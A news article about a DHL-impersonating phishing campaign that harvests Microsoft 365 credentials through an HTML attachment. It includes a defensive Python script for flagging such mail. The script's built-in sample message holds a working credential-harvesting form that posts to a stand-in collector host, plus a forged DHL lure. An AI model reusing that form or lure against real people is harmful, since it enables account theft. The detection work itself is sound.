
A new phishing campaign impersonating logistics giant DHL has been uncovered that attempts to steal Microsoft 365 credentials from victims in the education sector, researchers say.

Armorblox cybersecurity researchers recently uncovered a massive phishing campaign, with more than ten zero emails sent to inboxes belonging to a "private educational corporation."

The email is crafted to look like it comes from DHL: it carries the company's branding and a tone of voice one would associate with the shipping giant. In the email, titled "DHL Shipping Document / Invoice Receipt", the recipient is told that a customer of the service has sent a package to the wrong address and that they must provide the correct shipping address.

Naturally, the email comes with an attachment titled "Shipping Document Invoice Receipt" which, when opened, displays a blurred preview of what appears to be a Microsoft Excel file.

A Microsoft sign-in page is displayed over the blurred document, misleading victims into thinking they must sign in to their Microsoft 365 account to view the file's contents. Any credentials entered into that form go straight to the attackers.

“The email attack used language as a primary attack vector to bypass Microsoft Office 365 and EOP email security controls,” Armorblox explained. “These native email security layers can block massive spam and phishing campaigns, such as known malware and malicious URLs. However, this targeted email attack bypassed Microsoft's email security, as it did not include bad URLs or links and included an HTML file containing a malicious phishing form.”

As the researchers noted, the attackers also sent the message from a valid domain, which allowed it to pass Microsoft's email authentication checks.
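The two points above, that the message passed authentication and carried no links but hid the phishing form inside an HTML attachment, are exactly what a mail-filtering rule should look for. The script below is an added example for this article, not code from Armorblox or any vendor: it parses a constructed sample message (the domains, headers and form are invented for illustration), reads the Authentication-Results header, confirms the body contains no URLs, and then inspects every HTML attachment for a form with a password field, reporting where that form would post credentials.

```python
import email
import json
import re
from email import policy

# Constructed sample (not a real capture): SPF/DKIM pass, no URLs in the
# body, and an HTML attachment that overlays a login form on a fake preview.
SAMPLE_EML = """\
From: "DHL Express" <notifications@sender-example.test>
To: staff@school-example.test
Subject: DHL Shipping Document / Invoice Receipt
Authentication-Results: mx.school-example.test; spf=pass smtp.mailfrom=sender-example.test; dkim=pass header.d=sender-example.test
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

A customer sent a package to the wrong address. Please open the attached
document and confirm the correct shipping address.

--b1
Content-Type: text/html; name="Shipping Document Invoice Receipt.html"
Content-Disposition: attachment; filename="Shipping Document Invoice Receipt.html"

<html><body>
<img src="data:image/png;base64,AAAA" alt="blurred preview">
<form method="post" action="https://collector-example.test/submit">
  <input type="email" name="login">
  <input type="password" name="passwd">
  <button>Sign in</button>
</form>
</body></html>
--b1--
"""

FORM_RE = re.compile(r"<form\b[^>]*>", re.I)
ACTION_RE = re.compile(r'action\s*=\s*["\']?([^"\'\s>]+)', re.I)
PASSWORD_RE = re.compile(r'<input\b[^>]*type\s*=\s*["\']?password', re.I)
URL_RE = re.compile(r"https?://\S+", re.I)
AUTH_RE = re.compile(r"\b(spf|dkim|dmarc)=(\w+)", re.I)


def auth_results(msg):
    """Map spf/dkim/dmarc results from the Authentication-Results header."""
    hdr = msg.get("Authentication-Results", "") or ""
    return {k.lower(): v.lower() for k, v in AUTH_RE.findall(str(hdr))}


def html_attachments(msg):
    """Yield (filename, html_text) for each attachment that is HTML."""
    for part in msg.iter_attachments():
        fname = part.get_filename() or ""
        if part.get_content_type() == "text/html" or fname.lower().endswith((".html", ".htm")):
            yield fname, part.get_content()


def analyze(raw):
    """Classify a raw RFC 5322 message; 'auth pass' alone never clears it."""
    msg = email.message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    body_urls = URL_RE.findall(body.get_content()) if body else []
    findings = []
    for fname, html in html_attachments(msg):
        # A form with a password field inside an attachment is the phishing
        # pattern described in the article; the action shows where it posts.
        if FORM_RE.search(html) and PASSWORD_RE.search(html):
            findings.append({
                "attachment": fname,
                "reason": "credential form in HTML attachment",
                "posts_to": ACTION_RE.findall(html),
            })
    return {
        "auth": auth_results(msg),
        "body_urls": body_urls,
        "findings": findings,
        "verdict": "quarantine" if findings else "allow",
    }


if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_EML), indent=2))
```

The rule deliberately ignores the authentication result when deciding the verdict: SPF and DKIM only prove the message came from the domain it claims, and here that domain was a valid one. URL scanning of the body is likewise empty by design, so the decisive signal is the attachment itself.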

The best way for companies to guard against phishing attacks is to train their employees to look out for red flags in their inboxes, such as an unfamiliar sender address, typos and spelling mistakes in the email, a sense of urgency (legitimate emails will almost never require the user to respond urgently), and unexpected links or attachments.

Via: SiliconAngle
